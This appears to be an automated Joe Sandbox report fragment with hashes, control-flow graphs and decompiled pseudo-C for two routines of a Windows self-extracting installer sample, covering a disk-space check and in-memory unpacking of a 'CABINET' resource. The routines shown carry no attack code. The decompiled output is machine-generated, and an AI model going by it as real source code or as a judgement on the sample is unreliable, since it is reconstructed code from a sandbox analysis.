                                                                                                                                                                                                                                            • Instruction ID: bd5488a182c014e6690fe4457a7eb7d425e30b7b6f5d84a7a3cafbe513ae0522
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9264913478bbe3dbcb9747236043eb6e2a520708d4d4e11be30e2fdc6907caa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34812870F04A156BDF22ABB49D86BEE72ED9F64340F040466F586D2191EF748EC28B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 a9597d-a959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a959bb-a959d8 call a944b9 call a96285 324->325 326 a959dd-a95a1b GetDiskFreeSpaceA 324->326 343 a95c05-a95c14 call a96ce0 325->343 328 a95ba1-a95bde memset call a96285 GetLastError FormatMessageA 326->328 329 a95a21-a95a4a MulDiv 326->329 339 a95be3-a95bfc call a944b9 SetCurrentDirectoryA 328->339 329->328 332 a95a50-a95a6c GetVolumeInformationA 329->332 335 a95a6e-a95ab0 memset call a96285 GetLastError FormatMessageA 332->335 336 a95ab5-a95aca SetCurrentDirectoryA 332->336 335->339 337 a95acc-a95ad1 336->337 341 a95ad3-a95ad8 337->341 342 a95ae2-a95ae4 337->342 351 a95c02 339->351 341->342 347 a95ada-a95ae0 341->347 349 a95ae7-a95af8 342->349 350 a95ae6 342->350 347->337 347->342 353 a95af9-a95afb 349->353 350->349 354 a95c04 351->354 355 a95afd-a95b03 353->355 356 a95b05-a95b08 353->356 354->343 355->353 355->356 357 a95b0a-a95b1b call a944b9 356->357 358 a95b20-a95b27 356->358 357->351 360 a95b29-a95b33 358->360 361 a95b52-a95b5b 358->361 360->361 364 a95b35-a95b50 360->364 362 a95b62-a95b6d 361->362 365 a95b6f-a95b74 362->365 366 a95b76-a95b7d 362->366 364->362 367 a95b85 365->367 368 a95b7f-a95b81 366->368 369 a95b83 366->369 370 a95b87-a95b94 call a9268b 367->370 371 a95b96-a95b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A9597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E00A944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0xa99a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0xa99a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0xa99a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0xa99124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E00A9268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0xa99a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa989e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0xa99a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A96CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a9597d
                                                                                                                                                                                                                                            0x00a95988
                                                                                                                                                                                                                                            0x00a9598f
                                                                                                                                                                                                                                            0x00a9599a
                                                                                                                                                                                                                                            0x00a959a6
                                                                                                                                                                                                                                            0x00a959a8
                                                                                                                                                                                                                                            0x00a959af
                                                                                                                                                                                                                                            0x00a959b9
                                                                                                                                                                                                                                            0x00a959dd
                                                                                                                                                                                                                                            0x00a959e4
                                                                                                                                                                                                                                            0x00a959f1
                                                                                                                                                                                                                                            0x00a959fe
                                                                                                                                                                                                                                            0x00a95a0b
                                                                                                                                                                                                                                            0x00a95a13
                                                                                                                                                                                                                                            0x00a95a19
                                                                                                                                                                                                                                            0x00a95a1b
                                                                                                                                                                                                                                            0x00a95ba1
                                                                                                                                                                                                                                            0x00a95baf
                                                                                                                                                                                                                                            0x00a95bbd
                                                                                                                                                                                                                                            0x00a95bd8
                                                                                                                                                                                                                                            0x00a95bde
                                                                                                                                                                                                                                            0x00a95be3
                                                                                                                                                                                                                                            0x00a95bec
                                                                                                                                                                                                                                            0x00a95bf0
                                                                                                                                                                                                                                            0x00a95bfc
                                                                                                                                                                                                                                            0x00a95c02
                                                                                                                                                                                                                                            0x00a95c02
                                                                                                                                                                                                                                            0x00a95c02
                                                                                                                                                                                                                                            0x00a95c04
                                                                                                                                                                                                                                            0x00a95c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95c04
                                                                                                                                                                                                                                            0x00a95a27
                                                                                                                                                                                                                                            0x00a95a3a
                                                                                                                                                                                                                                            0x00a95a46
                                                                                                                                                                                                                                            0x00a95a48
                                                                                                                                                                                                                                            0x00a95a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95a64
                                                                                                                                                                                                                                            0x00a95a6a
                                                                                                                                                                                                                                            0x00a95a6c
                                                                                                                                                                                                                                            0x00a95abc
                                                                                                                                                                                                                                            0x00a95ac2
                                                                                                                                                                                                                                            0x00a95ac9
                                                                                                                                                                                                                                            0x00a95aca
                                                                                                                                                                                                                                            0x00a95aca
                                                                                                                                                                                                                                            0x00a95acc
                                                                                                                                                                                                                                            0x00a95acc
                                                                                                                                                                                                                                            0x00a95acf
                                                                                                                                                                                                                                            0x00a95ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ad3
                                                                                                                                                                                                                                            0x00a95ad6
                                                                                                                                                                                                                                            0x00a95ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ada
                                                                                                                                                                                                                                            0x00a95adc
                                                                                                                                                                                                                                            0x00a95add
                                                                                                                                                                                                                                            0x00a95add
                                                                                                                                                                                                                                            0x00a95ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ae0
                                                                                                                                                                                                                                            0x00a95ae2
                                                                                                                                                                                                                                            0x00a95ae4
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae6
                                                                                                                                                                                                                                            0x00a95ae9
                                                                                                                                                                                                                                            0x00a95aeb
                                                                                                                                                                                                                                            0x00a95af0
                                                                                                                                                                                                                                            0x00a95af6
                                                                                                                                                                                                                                            0x00a95af8
                                                                                                                                                                                                                                            0x00a95af9
                                                                                                                                                                                                                                            0x00a95af9
                                                                                                                                                                                                                                            0x00a95afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95afd
                                                                                                                                                                                                                                            0x00a95aff
                                                                                                                                                                                                                                            0x00a95b00
                                                                                                                                                                                                                                            0x00a95b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b03
                                                                                                                                                                                                                                            0x00a95b05
                                                                                                                                                                                                                                            0x00a95b08
                                                                                                                                                                                                                                            0x00a95b20
                                                                                                                                                                                                                                            0x00a95b27
                                                                                                                                                                                                                                            0x00a95b52
                                                                                                                                                                                                                                            0x00a95b52
                                                                                                                                                                                                                                            0x00a95b5b
                                                                                                                                                                                                                                            0x00a95b62
                                                                                                                                                                                                                                            0x00a95b6b
                                                                                                                                                                                                                                            0x00a95b6d
                                                                                                                                                                                                                                            0x00a95b76
                                                                                                                                                                                                                                            0x00a95b7d
                                                                                                                                                                                                                                            0x00a95b83
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b7f
                                                                                                                                                                                                                                            0x00a95b6f
                                                                                                                                                                                                                                            0x00a95b72
                                                                                                                                                                                                                                            0x00a95b72
                                                                                                                                                                                                                                            0x00a95b85
                                                                                                                                                                                                                                            0x00a95b98
                                                                                                                                                                                                                                            0x00a95b9e
                                                                                                                                                                                                                                            0x00a95b87
                                                                                                                                                                                                                                            0x00a95b8f
                                                                                                                                                                                                                                            0x00a95b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b85
                                                                                                                                                                                                                                            0x00a95b29
                                                                                                                                                                                                                                            0x00a95b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b35
                                                                                                                                                                                                                                            0x00a95b48
                                                                                                                                                                                                                                            0x00a95b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b4a
                                                                                                                                                                                                                                            0x00a95b0f
                                                                                                                                                                                                                                            0x00a95b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95b16
                                                                                                                                                                                                                                            0x00a95a7c
                                                                                                                                                                                                                                            0x00a95a8a
                                                                                                                                                                                                                                            0x00a95aa5
                                                                                                                                                                                                                                            0x00a95aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a959bb
                                                                                                                                                                                                                                            0x00a959c0
                                                                                                                                                                                                                                            0x00a959c7
                                                                                                                                                                                                                                            0x00a959d1
                                                                                                                                                                                                                                            0x00a959d6
                                                                                                                                                                                                                                            0x00a95c05
                                                                                                                                                                                                                                            0x00a95c14
                                                                                                                                                                                                                                            0x00a95c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A95A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A95A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A95A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A95A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A95A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A95AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A95BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: cec1c4603227e4d66ba854452c73809151af4eaf72869cbd91e9984e61b82c5b
                                                                                                                                                                                                                                            • Instruction ID: cf13781c1ffcf952c122ec27dcd2d611bebea0298754f13fb84d4b0ed8fc9d06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec1c4603227e4d66ba854452c73809151af4eaf72869cbd91e9984e61b82c5b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C17171B1B00618AFEF16DB74CD86BFB77FCEB48340F5441AAF50596140EA349E868B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 a94fe0-a9501a call a9468f FindResourceA LoadResource LockResource 377 a95161-a95163 374->377 378 a95020-a95027 374->378 379 a95029-a95051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 a95057-a9505e call a94efd 378->380 379->380 383 a9507c-a950b4 380->383 384 a95060-a95077 call a944b9 380->384 389 a950e8-a95104 call a944b9 383->389 390 a950b6-a950da 383->390 388 a95107-a9510e 384->388 392 a9511d-a9511f 388->392 393 a95110-a95117 FreeResource 388->393 398 a95106 389->398 390->398 402 a950dc 390->402 395 a9513a-a95141 392->395 396 a95121-a95127 392->396 393->392 400 a9515f 395->400 401 a95143-a9514a 395->401 396->395 399 a95129-a95135 call a944b9 396->399 398->388 399->395 400->377 401->400 404 a9514c-a95159 SendMessageA 401->404 405 a950e3-a950e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A94FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa99144 = E00A9468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa99140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa98584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A94EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A94CA0, E00A94CC0, E00A94980, E00A94A50, E00A94AD0, E00A94B60, E00A94BC0, 1, 0xa99148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa99148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            						E00A944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa91140, 0, E00A94CD0, 0, 0xa99140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            					E00A944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa99140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa99140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa991d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A944B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa98a38 & 0x00000001) == 0 && ( *0xa99a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa98584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x00a94fe0
                                                                                                                                                                                                                                            0x00a94fe6
                                                                                                                                                                                                                                            0x00a94ff9
                                                                                                                                                                                                                                            0x00a9500d
                                                                                                                                                                                                                                            0x00a95013
                                                                                                                                                                                                                                            0x00a9501a
                                                                                                                                                                                                                                            0x00a95163
                                                                                                                                                                                                                                            0x00a95163
                                                                                                                                                                                                                                            0x00a95020
                                                                                                                                                                                                                                            0x00a95027
                                                                                                                                                                                                                                            0x00a95037
                                                                                                                                                                                                                                            0x00a95051
                                                                                                                                                                                                                                            0x00a95051
                                                                                                                                                                                                                                            0x00a95057
                                                                                                                                                                                                                                            0x00a9505e
                                                                                                                                                                                                                                            0x00a950a7
                                                                                                                                                                                                                                            0x00a950ad
                                                                                                                                                                                                                                            0x00a950b4
                                                                                                                                                                                                                                            0x00a950e8
                                                                                                                                                                                                                                            0x00a950e8
                                                                                                                                                                                                                                            0x00a950ee
                                                                                                                                                                                                                                            0x00a950ff
                                                                                                                                                                                                                                            0x00a95104
                                                                                                                                                                                                                                            0x00a95106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95106
                                                                                                                                                                                                                                            0x00a950cd
                                                                                                                                                                                                                                            0x00a950d3
                                                                                                                                                                                                                                            0x00a950da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a950dd
                                                                                                                                                                                                                                            0x00a950e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95060
                                                                                                                                                                                                                                            0x00a95060
                                                                                                                                                                                                                                            0x00a95070
                                                                                                                                                                                                                                            0x00a95075
                                                                                                                                                                                                                                            0x00a95107
                                                                                                                                                                                                                                            0x00a95107
                                                                                                                                                                                                                                            0x00a9510e
                                                                                                                                                                                                                                            0x00a95111
                                                                                                                                                                                                                                            0x00a95117
                                                                                                                                                                                                                                            0x00a95117
                                                                                                                                                                                                                                            0x00a9511f
                                                                                                                                                                                                                                            0x00a95121
                                                                                                                                                                                                                                            0x00a95127
                                                                                                                                                                                                                                            0x00a95135
                                                                                                                                                                                                                                            0x00a95135
                                                                                                                                                                                                                                            0x00a95127
                                                                                                                                                                                                                                            0x00a95141
                                                                                                                                                                                                                                            0x00a95159
                                                                                                                                                                                                                                            0x00a95159
                                                                                                                                                                                                                                            0x00000000
